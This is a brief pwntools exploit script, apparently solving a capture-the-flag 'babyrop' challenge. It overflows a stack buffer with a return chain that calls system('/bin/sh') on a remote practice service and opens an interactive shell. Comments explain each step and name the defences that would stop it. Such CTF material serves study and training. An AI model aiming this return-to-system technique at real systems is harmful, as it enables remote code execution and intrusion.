exp
from pwn import *
# Debug-level logging: pwntools prints every byte sent and received, which
# makes the exchange with the service easy to audit afterwards.
context.log_level = 'debug'

proc_name = './babyrop'
elf = ELF(proc_name)

# Local run kept for reference; the script talks to the remote instance instead.
# p = process(proc_name)
p = remote('node3.buuoj.cn', 25587)

# Fixed addresses inside the binary. Hard-coding them only holds if the target
# is loaded at a constant base (no PIE) -- presumably the case here; confirm
# with checksec before relying on these values.
pop_rdi_ret = 0x400683  # presumably a `pop rdi; ret` gadget, going by the name
bin_sh_str = 0x601048  # presumably a "/bin/sh" string in the binary's data
system_addr = elf.sym['system']  # looked up in the ELF's symbol table

# 0x10 + 8 filler bytes: presumably a 0x10-byte stack buffer plus the saved
# rbp, so the next 8 bytes land on the saved return address -- TODO confirm
# against the disassembly.
filler = b'a' * (0x10 + 8)

# Return chain, each entry packed as a 64-bit little-endian word:
# gadget, the value it loads, then the function that receives it.
rop_words = (pop_rdi_ret, bin_sh_str, system_addr)
payload = filler + b''.join(p64(word) for word in rop_words)

# NOTE(review): this layout relies on an unchecked write past a stack buffer
# and on constant code/data addresses. A stack canary would catch the
# overwrite before the function returns, and a PIE build with ASLR would
# invalidate the hard-coded addresses above.
p.sendline(payload)
p.interactive()